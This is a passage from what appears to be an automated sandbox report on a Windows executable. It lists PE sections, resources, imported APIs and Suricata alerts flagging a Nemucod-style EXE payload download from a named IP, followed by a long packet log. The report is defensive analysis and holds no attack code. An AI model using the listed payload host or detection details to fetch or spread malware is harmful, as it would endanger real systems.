.data	0xc000	0x2200	0x1000	ffa6e0e76a954e6a3fd657281ecc2607	False	0.1767578125	data	2.232690021204779	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0xf000	0x5d0	0x600	b0c923173cdcf0b82f939c3fafc6e4d7	False	0.4954427083333333	data	4.252873747775349	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x10000	0x1c85b	0x1ca00	76e433f03ef9e8912bd6c3f69d2cd983	False	0.1576060998908297	data	4.668623233661869	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2d000	0x3de	0x400	3e80cb8268adc697616a87179e434ae9	False	0.3896484375	data	3.553072991109634	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x104a8	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"			0.4772727272727273
RT_BITMAP	0x105dc	0x328	Device independent bitmap graphic, 16 x 16 x 24, image size 768			0.10024752475247525
RT_ICON	0x10904	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152			0.23353658536585367
RT_ICON	0x10f6c	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512			0.32661290322580644
RT_ICON	0x11254	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128			0.4594594594594595
RT_ICON	0x1137c	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors			0.2316098081023454
RT_ICON	0x12224	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors			0.26173285198555957
RT_ICON	0x12acc	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors			0.21315028901734104
RT_ICON	0x13034	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584			0.09295516384715485
RT_ICON	0x2385c	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896			0.19496929617383088
RT_ICON	0x27a84	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600			0.24439834024896265
RT_ICON	0x2a02c	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224			0.34615384615384615
RT_ICON	0x2b0d4	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400			0.40327868852459015
RT_ICON	0x2ba5c	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088			0.5629432624113475
RT_STRING	0x2bec4	0x54	data	Chinese	China	0.7380952380952381
RT_RCDATA	0x2bf18	0x80	data	English	United States	1.0859375
RT_GROUP_CURSOR	0x2bf98	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.25
RT_GROUP_ICON	0x2bfac	0xae	data			0.6436781609195402
RT_VERSION	0x2c05c	0x32c	data	Chinese	China	0.49014778325123154
RT_MANIFEST	0x2c388	0x4d3	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.47692307692307695

Imports

DLL	Import
KERNEL32.dll	_lclose, GetModuleFileNameA, _lread, _llseek, _lopen, _lwrite, _lcreat, CreateDirectoryA, SetCurrentDirectoryA, lstrcatA, FreeLibrary, GetProcAddress, LoadLibraryA, GetDiskFreeSpaceA, GetFileAttributesA, RemoveDirectoryA, DeleteFileA, lstrlenA, GetCurrentDirectoryA, CloseHandle, GetExitCodeProcess, GetLastError, LocalFree, GetCurrentProcess, MoveFileExA, Sleep, GetStringTypeW, MultiByteToWideChar, LCMapStringW, HeapReAlloc, HeapSize, IsValidCodePage, lstrcpyA, GetTempPathA, CompareStringA, GetOEMCP, GetACP, GetModuleHandleW, ExitProcess, DecodePointer, HeapFree, HeapAlloc, GetCommandLineA, GetStartupInfoW, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, EncodePointer, LoadLibraryW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, TerminateProcess, FlsGetValue, FlsSetValue, FlsFree, SetLastError, GetCurrentThreadId, FlsAlloc, RtlUnwindEx, WriteFile, GetStdHandle, GetModuleFileNameW, HeapSetInformation, GetVersion, HeapCreate, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCPInfo
USER32.dll	TranslateMessage, DispatchMessageA, PeekMessageA, wsprintfA, LoadCursorA, SetCursor, MessageBoxA, MsgWaitForMultipleObjects
ADVAPI32.dll	GetTokenInformation, OpenProcessToken
SHELL32.dll	ShellExecuteExA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-29T16:03:38.923018+0100	2022482	ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01	1	192.168.2.5	49713	104.21.81.224	443	TCP
2024-12-29T16:03:39.325163+0100	2021954	ET MALWARE JS/Nemucod.M.gen downloading EXE payload	1	104.21.81.224	443	192.168.2.5	49713	TCP
2024-12-29T16:03:45.497191+0100	2022482	ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01	1	192.168.2.5	49736	104.21.81.224	80	TCP
2024-12-29T16:03:47.231584+0100	2022482	ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01	1	192.168.2.5	49737	104.21.81.224	443	TCP
2024-12-29T16:03:47.634438+0100	2021954	ET MALWARE JS/Nemucod.M.gen downloading EXE payload	1	104.21.81.224	443	192.168.2.5	49737	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 29, 2024 16:03:36.319526911 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:36.319557905 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:36.319652081 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:36.330916882 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:36.330934048 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:37.596925020 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:37.597006083 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:37.664736032 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:37.664757013 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:37.665126085 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:37.665323019 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:37.666724920 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:37.711333990 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:38.923024893 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:38.923074961 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:38.923084021 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:38.923094988 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:38.923124075 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:38.923125982 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:38.923152924 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:38.923160076 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:38.923171043 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:38.923202991 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:38.923207045 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:38.923213959 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:38.923243046 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:38.923259974 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:38.931276083 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:38.931328058 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:38.931394100 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:38.931476116 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:38.939804077 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:38.939860106 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:38.939867020 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:38.939913988 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:38.948292971 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:38.948347092 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.043701887 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.043750048 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.124000072 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.124063969 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.127882957 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.127943993 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.129482985 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.129538059 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.137541056 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.137595892 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.137640953 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.137684107 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.145716906 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.145767927 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.145812988 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.145860910 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.153687954 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.153728008 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.153800964 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.153841972 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.161741972 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.163202047 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.163219929 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.163266897 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.169868946 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.169929028 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.169981003 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.170027018 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.177886963 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.177933931 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.178087950 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.178186893 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.185909986 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.185956955 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.186028004 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.186129093 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.192955017 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.193003893 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.200021029 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.200062037 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.200189114 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.200381994 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.325170040 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.325498104 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.325524092 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.325836897 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.327480078 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.327676058 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.328593016 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.328675032 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.333278894 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.333430052 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.333437920 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.333503008 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.337912083 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.337961912 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.338021994 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.338071108 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.342770100 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.342875004 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.352215052 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.352304935 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.357136011 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.357213020 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.361901999 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.361989975 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.371217966 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.371263027 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.371293068 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.376471996 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.376548052 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.385555983 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.385627031 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.395071983 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.395128965 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.399816990 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.399884939 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.409347057 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.409421921 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.418812037 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.418893099 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.423763037 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.423882008 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.528296947 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.528366089 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.533446074 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.533513069 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.540945053 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.541003942 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.547987938 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.548053980 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.554900885 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.554966927 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.558342934 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.558402061 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.565087080 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.565150976 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.568470001 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.568531990 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.575212002 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.575262070 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.581856012 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.581918955 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.588557005 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.588609934 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.593611002 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.593666077 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.599533081 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.599594116 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.606821060 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.606893063 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.612235069 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.612301111 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.615576982 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.615632057 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.622307062 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.622364998 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.625780106 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.625828981 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.632479906 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.632529974 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.639193058 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.639246941 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.645968914 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.646025896 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.649296999 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.649353027 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.727490902 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.727641106 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.729270935 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.729418993 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.732044935 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.732127905 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.737214088 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.737340927 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.742132902 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.742269039 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.747056007 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.747129917 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.749564886 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.749677896 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.761197090 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.761205912 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.761240005 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.761270046 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.761288881 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.761322021 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.761342049 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.776289940 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.776305914 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.776393890 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.776393890 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.776412010 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.776478052 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.787395954 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.787411928 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.787489891 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.787489891 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.787499905 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.787636042 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.795258999 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.795275927 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.795342922 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.795351028 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.795664072 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.803716898 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.803735018 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.803822041 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.803822041 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.803829908 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.803899050 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.811065912 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.811079979 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.811148882 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.811157942 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.811470985 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.930510044 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.930526972 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.930638075 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.930649996 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.930850029 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.938318014 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.938333988 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.938397884 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.938406944 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.938477993 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.945693970 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.945708990 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.945805073 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.945805073 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.945815086 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.945873022 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.952162981 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.952178001 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.952270031 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.952279091 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.952483892 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.959945917 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.959961891 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.960272074 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.960280895 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.961114883 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.966480017 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.966499090 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.966578960 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.966587067 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.966680050 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.973695040 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.973711014 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.973799944 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.973812103 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.973889112 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.981082916 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.981091976 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.981312990 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:39.981323004 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:39.981429100 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:40.147475958 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:40.147501945 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:40.147591114 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:40.147591114 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:40.147608042 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:40.147716045 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:40.153879881 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:40.153898954 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:40.153985977 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:40.153985977 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:40.153995037 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:40.154196978 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:40.161144018 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:40.161159039 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:40.161251068 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:40.161251068 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:40.161258936 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:40.161478043 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:40.168515921 CET	443	49713	104.21.81.224	192.168.2.5
